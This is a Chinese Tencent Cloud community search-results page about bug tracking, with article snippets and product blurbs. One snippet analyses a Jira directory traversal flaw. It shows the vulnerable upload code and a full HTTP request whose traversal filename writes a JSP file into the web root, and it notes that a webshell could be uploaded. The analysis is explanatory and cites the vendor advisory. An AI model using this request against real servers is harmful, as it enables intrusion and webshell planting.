相关内容

TAPD 敏捷项目管理

TAPD是源自于腾讯的敏捷产品研发协作平台，提供贯穿敏捷开发生命周期的一站式服务。覆盖从产品概念形成、产品规划、需求分析、项目规划和跟踪、质量测试到构建发布、用户反馈跟踪的产品研发全周期，帮助研发团队规范和改进研发过程，提升研发效率和产品质量。

• android常见bug跟踪

  前言对app的线上bug的收集（友盟、云捕等）有时会得到这样的异常堆栈信息：没有一行代码是有关自身程序代码的。这使得对bug的解决无从下手，根据经验，内存不足OOM，Dialog关闭，ListView等相关代码很容易引起这类错误。下面总结下BaseAdapter.getView崩溃bug，然后给出如何编写代码来方便以后对它的定位。更多时候，除了得到以上的错误堆栈，对于真正的bug再无更多信息。实际上是无法判断出具体出问题的Adapter的。堆栈信息只跟踪到LisView，而不会指向具体的Adapter。 （本文使用Atom编写）

  来自：

  云+社区专栏

  浏览：286

• 12 个顶级 Bug 跟踪工具

  来自：

  云+社区专栏

  浏览：257
• 广告

  关闭

  云+社区杂货摊第四季上线啦~

  攒云+值，TOP 100 必得云+社区定制视频礼盒

您找到你想要的搜索结果了吗？
是的
没有找到

• 今日推荐：git-bug

  今日推荐很久之前，一直想写个bug追踪的系统，但是吧，一直也没写出来，今天逛g站，突然发现这个，感觉，噢哟，很不错哦，值得分享。这是个离线bug追踪系统。git-bug是一个bug跟踪器： ‍在Git是完全内嵌：只需要git仓库有一个bug跟踪 分布：‍远程使用普通的Git合作，推动和拉动你的error！脱机工作原理：无论在哪，都可以阅读和修改bug防止厂商锁定：你平时的服务已关闭或坏了？会自动备份。速度：列出错误或打开它们是几毫秒内不影响项目：没有文件在项目中添加集成工具：使用喜欢的UI（CLI，终端，网络），或通过CLI或GraphQL API与现有的工具集成桥梁其他bug跟踪系统：使用桥进口和出口到其他跟踪器废话不多说了，直接上地址： https:github.comMichaelMuregit-bug?

  来自：

  云+社区专栏

  浏览：134

• 软件测试人员不通过QQ、微信上报Bug的原因解析

  那么，Bug 跟踪工具是怎么逐步替代 QQ、邮件等方式来处理 Bug 的呢？为什么要使用 Bug 跟踪工具？Bug 跟踪工具则很好的贯彻了这一点，将 Bug 的解决过程流程化。你平时在 Bug 跟踪系统中看到的 Bug 状态，看起来只是一个有限的状态列表，但背后其实是一套解决 Bug 的流程。使用 Bug 跟踪工具的注意事项报告 Bug 的目的是为了能跟踪 Bug，以及帮助开发人员重现直到解决问题。要想做到测试和开发高效协作，这里面有一些需要注意的事项。首先，所有的 Bug 都应该通过 Bug 跟踪系统管理和跟踪，不应该再通过 QQ 微信 邮件的方式跟踪 Bug。如果客户、同事通过 Bug 跟踪系统之外的其他途径反馈 Bug，应该统一提交到 Bug 跟踪系统管理跟踪起来。然后，不能把多条 Bug 合并成一条，一个 Bug 创建一个独立的 Ticket。

  来自：

  云+社区专栏

  浏览：288

• 开源BUG跟踪平台JIRA目录遍历漏洞分析

  作者 Taskiller最近，一则新发布的公告报告了一个影响Jira 5.0.11和6.0.3版本的目录遍历漏洞，该漏洞在去年7月份被验证，并在接下来的几个月得以修复。攻击方法很简单，但是潜在影响却是非常大的，该漏洞可能允许攻击者上传文件作为webshell。后文我会解决该漏洞如何通过静态分析发现，以及什么一个小细节使其只能在Windows系统上被利用。漏洞识别以下代码源自插件IssuesCollector，该插件使用REST api，支持上传屏幕截图文件作为附件附加到说明中。comatlassianjiracollectorpluginrestTemporaryAttachmentsResource.java @POST @Path(multipart{collectorId}) @Consumes({multipartform-data}) @Produces({texthtml}) publicResponse attachTemporaryFileViaForm(@PathParam(collectorId)String collectorId, @MultipartFormParam(screenshot)Collection fileParts) { ServiceOutcome outcome =this.collectorService.getCollector(collectorId); FilePartfilePart = (FilePart)fileParts.iterator().next(); try { TemporaryAttachmenttemporaryAttachment = createTemporaryAttachment(filePart.getName(),filePart.getContentType(), filePart.getInputStream()); temporaryAttachmentsMonitor.add(temporaryAttachment); context.put(temporaryAttachment,temporaryAttachment); returnResponse.ok(renderTemplate(templatesresttempfilejson.vm,context)).cacheControl(com.atlassian.jira.rest.v1.util.CacheControl.NO_CACHE).build(); } catch(IOException e) { } returnResponse.serverError().cacheControl(com.atlassian.jira.rest.v1.util.CacheControl.NO_CACHE).build(); } privateTemporaryAttachment createTemporaryAttachment(String fileName, StringcontentType, InputStream inputStream) { FiletmpDir = AttachmentUtils.getTemporaryAttachmentDirectory(); longuniqueId; FiletempAttachmentFile; do { uniqueId= getUUID(); tempAttachmentFile= new File(tmpDir, uniqueId + _ + fileName); } while(tempAttachmentFile.exists()); FileOutputStreamoutput = null; try { output= new FileOutputStream(tempAttachmentFile); IOUtils.copy(inputStream,output); output.close(); } catch(IOException e) { IOUtils.closeQuietly(output); log.error(Errorcreating temporary attachment, e); returnnull; } returnnew TemporaryAttachment(Long.valueOf(uniqueId), Long.valueOf(-1L),tempAttachmentFile, fileName, contentType); }在第31行，代码将上传的文件移动到一个临时目录中，filename的值没有任何过滤，该值由多个部分组合而成，因此可以通过客户端控制。31 tempAttachmentFile = new File(tmpDir, uniqueId + _ +fileName);来源：13 createTemporaryAttachment(filePart.getName(),filePart.getContentType(), filePart.getInputStream());漏洞利用为了使文件上传到附件目录之外，可以用一个经典的目录遍历模式遍历到公共web目录的根目录（atlassian-jira）。在之前示例代码可以看到其并没有对文件内容进行过滤，因此可以上传一个JSP shell来获取系统权限。POSTrestcollectors1.0tempattachmentmultipart2c1ce5fa HTTP1.1Host:hackme.atlassian.netCookie:atlassian.xsrf.token=BQ79-A85Q-7DOM-UMFN|e98231aaaef98a0d9dc7c52e87f4e84cf9cd3085Connection:keep-aliveContent-Type:multipartform-data;boundary=---------------------------16266315542468Content-Length:345 -----------------------------16266315542468Content-Disposition:form-data; name=screenshot;filename=......atlassian-jirahello.jspContent-Type:textplain Helloworld!-----------------------------16266315542468请求中的文件名......atlassian-jirahello.jsp会被连结到uniqueid从而代替临时目录路径。在Windows系统上：C:ProgramFilesAtlassianApplicationDataJIRAcachestmp_attachments6177763437089900999_......atlassian-jirahello.jsp在Linux系统上：optatlassianjiracachestmp_attachments6177763437089900999_......atlassian-jirahello.jsp在windows系统上路径会被规范化为C:Program FilesAtlassianApplication DataJIRAatlassian-jirahello.jsp，之后文件被写入。换句话说，Linux系统会使用整个完整的路径，并会发现目录optatlassianjiracachestmp_attachments6177763437089900999_根据不存在，因此无法利用。这里可以将上传的文件替换为一个webshell。漏洞修补如果读者维护着一款Jira实例，应该已经接收到更新提示了，如果没有，请参考文章开头提到的公告。参考JIRASecurity Advisory 2014-02-26 : The official advisoryhttps:confluence.atlassian.comdisplayJIRAJIRA+Security+Advisory+2014-02-26WASC:Path traversal : Complete description of the Path traversal vulnerabilityhttp:projects.webappsec.orgwpage13246952Path%20Traversal

  来自：

  云+社区专栏

  浏览：827

• 碎片化 | 第五阶段-06-BUG如何去处理-视频

  如清晰度低，可转PC网页观看高清版本： http:v.qq.comxpager0500j3hk3p.htmlBUG如何处理测试--将问题录入bug跟踪管理系统，并分配解决人，解决人员需要解决完毕之后，去系统修改BUG问题状态-补丁上传 此时需要淡定、冷静、冷静1：首先判断BUG所属层次 404、连接超时2：判断BUG所属项目阶段 前端、后台、服务器、网关3：明确BUG所在环境 测试环境： 1：去看应用服务器日志： - 根据时间段找取对应的日志文件 - 判断是属于后台还是前端问题 - 后台：302、304、402、404、500 线上环境(生产环境、正式环境)： 1：找运维下载日志文件 2：判断BUG所属前端、后台 3：出具补丁 系统：BUG跟踪管理系统(禅道、JBUG)业绩： KPI----自评(代码规范、上线功能、项目周期执行等)---97 上级评价------95 部门负责人评价-----95 KPI:00-60-----500 60-80-----10000 80+------20000 评审依据：BUG跟踪管理系统评审阶段：1-2周评审一次 代码、数据库、表、注释、规范

  来自：

  云+社区专栏

  浏览：491

• 云审计

  ,互动白板,移动推送,实时音视频,腾讯微服务平台,云点播,私有网络,Web 应用防火墙,语音合成,语音识别,机器翻译,智能钛机器学习平台,产品概览,查询云审计日志,查看操作记录事件详情,联系我们,使用跟踪集投递日志,产品概述,产品优势,产品功能,词汇表,常见问题,应用场景,快速入门,产品简介,API 文档,错误码,检索日志,检索日志,创建跟踪集,删除跟踪集,开启日志采集,关闭日志采集,更新跟踪集,拉取跟踪集列表,获取跟踪集信息,查询是否开通跟踪集,开通跟踪集服务,PHP SDK 文档,创建云审计,开启日志采集,关闭日志采集,拉取 COS 列表,拉取云审计列表,更新云审计,获取云审计信息,删除云审计,购买指南,简介云点播,私有网络,Web 应用防火墙,语音技术,语音合成,语音识别,自然语言处理,机器翻译,AI 平台服务,智能钛机器学习平台,产品概览,查询云审计日志,查看操作记录事件详情,操作指南,联系我们,使用跟踪集投递日志

  来自：

  文档云审计

• 腾讯云代码分析

  精准跟踪管理代码分析发现的代码质量缺陷、代码规范、代码安全漏洞、无效代码，以及度量代码复杂度、重复代码、代码统计。

  来自：

  产品

• 腾讯电子签集成版

  集成后，腾讯电子签全程监督跟踪，确保合同法律效力。在证据保全上，可以实现毫秒级自动存证及在线出证，为企业提供定制化的电子签约服务。

  来自：

  产品

• 项目管理

  迭代统计,导入和导出事项,自定义事项类型,自定义事项属性,自定义工作流,筛选事项,引用资源和上传附件,管理版本,管理标签,管理事项视图,模式介绍,管理迭代,管理需求,管理任务,管理缺陷,阻塞关系,工时统计,跟踪进度导入和导出事项,自定义事项类型,自定义事项属性,自定义工作流,筛选事项,引用资源和上传附件,管理版本,管理标签,管理事项视图,经典协同模式,模式介绍,管理迭代,管理需求,管理任务,管理缺陷,阻塞关系,工时统计,跟踪进度

  来自：

  文档项目管理

• 不建立你自己的错误跟踪系统的原因？

  现在有好几次我一直在面对来自一个团队的计划，他们希望建立自己的bug跟踪系统 - 不是作为产品，而是作为一个内部工具。 可以使用哪些参数来支持购买现有的错误跟踪系统吗？

  来自：

  云+社区问答

  回答：2

• Android Studio集成Bug管理系统

  在Android开发中，对于Bug的管理、追踪是非常重要的，通常，开发和Bug追踪是分开的，提交代码后，需要打开网页来进行Bug管理。但是！！！你不觉得很麻烦吗，在Android Studio中，你可以进行版本管理，那么为什么就不能进行Bug管理呢？确实，你说的对，完全是可以的！！！这里大家可以选择各种Bug管理工具，几乎包括了市面上常用的各种Bug跟踪管理工具。由于鄙司使用的是JIRA，所以这里点击JIRA，填入公司JIRA服务器的地址，如图所示：?管理Bug设置成功后，在菜单栏就会多处一个下拉框，如图所示：?点击Open Task，就会弹出跟你相关的所有JIRA信息，如图所示：?你可以搜索，或者直接点击Bug进去修改相关状态，同时，还能设置相应的commit信息，如图所示：?提交的信息可以根据模板来进行生成，如图所示：?

  来自：

  云+社区专栏

  浏览：271

• 云数据库 SQL Server

  收缩数据库mdf,启用&禁用数据库CT,开启&关闭数据库CDC,查询数据库配置信息,修改实例参数,查询实例的可设置参数列表,查询实例参数修改历史,设置实例参数,查看参数修改历史,变更数据捕获 CDC,更改跟踪mdf,启用&禁用数据库CT,开启&关闭数据库CDC,查询数据库配置信息,修改实例参数,查询实例的可设置参数列表,查询实例参数修改历史,参数配置,设置实例参数,查看参数修改历史,变更数据捕获 CDC,更改跟踪

  来自：

  文档云数据库 SQL Server

• 常用工具：推荐 12 个知名的 Bug 跟踪工具

  来自：

  云+社区专栏

  浏览：129

• 物联网智能视频服务（消费版）

  启用设备,停止设备推流,禁用设备,获取设备信息列表,获取设备信息,删除设备,创建设备,向设备发送在线消息,修改设备物模型行为,获取物模型操作结果,获取设备物模型,查询指定设备是否在白名单,查询设备日志跟踪白名单获取设备信息列表,获取设备信息,删除设备,创建设备,设备物模型相关接口,向设备发送在线消息,修改设备物模型行为,获取物模型操作结果,获取设备物模型,设备日志相关接口,查询指定设备是否在白名单,查询设备日志跟踪白名单

  来自：

  文档物联网智能视频服务（消费版）

• 云服务器

  腾讯云服务器（CVM）为您提供安全可靠的弹性云计算服务。只需几分钟，您就可以在云端获取和启用云服务器，并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费，可以为您节约计算成本。

  来自：

  产品

• GPU 云服务器

  腾讯GPU 云服务器是提供 GPU 算力的弹性计算服务，具有超强的并行计算能力，作为 IaaS 层的尖兵利器，服务于深度学习训练、科学计算、图形图像处理、视频编解码等场景……

  来自：

  产品

• FPGA 云服务器

  腾讯FPGA云服务器是基于FPGA硬件可编程加速的弹性计算服务，您只需几分钟就可以获取并部署您的FPGA实例。结合IP市场提供的图片，视频，基因等相关领域的计算解决方案，提供无与伦比的计算加速能力……

  来自：

  产品

• 专用宿主机

  专用宿主机（CDH）提供用户独享的物理服务器资源，满足您资源独享、资源物理隔离、安全、合规需求。专用宿主机搭载了腾讯云虚拟化系统，购买之后，您可在其上灵活创建、管理多个自定义规格的云服务器实例，自主规划物理资源的使用。

  来自：

  产品